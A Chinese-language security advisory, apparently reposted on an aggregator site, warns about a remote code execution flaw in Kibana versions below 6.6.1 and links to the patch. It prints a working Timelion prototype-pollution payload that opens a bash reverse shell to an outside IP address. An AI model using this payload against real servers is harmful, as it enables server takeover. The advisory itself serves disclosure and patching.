最新漏洞预警Kibana远程代码执行漏洞

Posted 黑客信徒

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了最新漏洞预警Kibana远程代码执行漏洞相关的知识,希望对你有一定的参考价值。


  Kibana < 6.6.0 代码执行漏洞  




一:漏洞描述


Kibana是一个开源的分析和可视化平台,常被用于和Elasticsearch一起工作。用Kibana来搜索、查看、并和存储在Elasticsearch索引中的数据进行交互。可以轻松地执行高级数据分析,并且以各种图标、表格和地图的形式可视化数据。做运维的大佬们对他应该特别熟悉。



昨天下午小编喝完美女同事送的奶茶后,精神异常抖擞。就在今天凌晨,小编监测到小于6.6.0版本的Kibana被曝出存在远程代码执行漏洞(remote code execution)。


该漏洞存在于Kibana节点的环境变量中,攻击者能够通过污染的节点环境变量来执行任意javascript代码。从而直接接管服务器。危害较大!!!


二:漏洞等级


高危


三:漏洞攻击演示


POC:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')


漏洞利用:



触发漏洞后即可拿到服务器权限,执行任意命令。

该漏洞只影响小于6.6.1的版本。目前kibana最新版是7.4.0。小编扫了300多个公网可访问的kibana系统,发现没一个存在漏洞的。不知道公司内网使用低版本的多不多。请使用该系统的尽快排查一下是否受影响。


四:影响范围


Kibana < 5.6.15 

Kibana < 6.6.1


五:解决方案


可通过以下链接升级到Kibana版本6.6.1或5.6.15。

https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077



小编会实时跟进该漏洞的实时进展

关于漏洞更多详情、疑惑  随时留言!有问必答!




第一时间 实时 获取最新漏洞预警



以上是关于最新漏洞预警Kibana远程代码执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章

高危安全预警Kibana < 6.6.1远程命令执行漏洞(CVE-2019-7609)

[漏洞预警] kibana < 6.6.0 代码执行漏洞

漏洞预警SQLite远程代码执行漏洞

漏洞预警 | 高危Struts REST插件远程代码执行漏洞(S2-052)

漏洞预警 | ECShop全系列版本远程代码执行高危漏洞

漏洞预警 | solr远程代码执行漏洞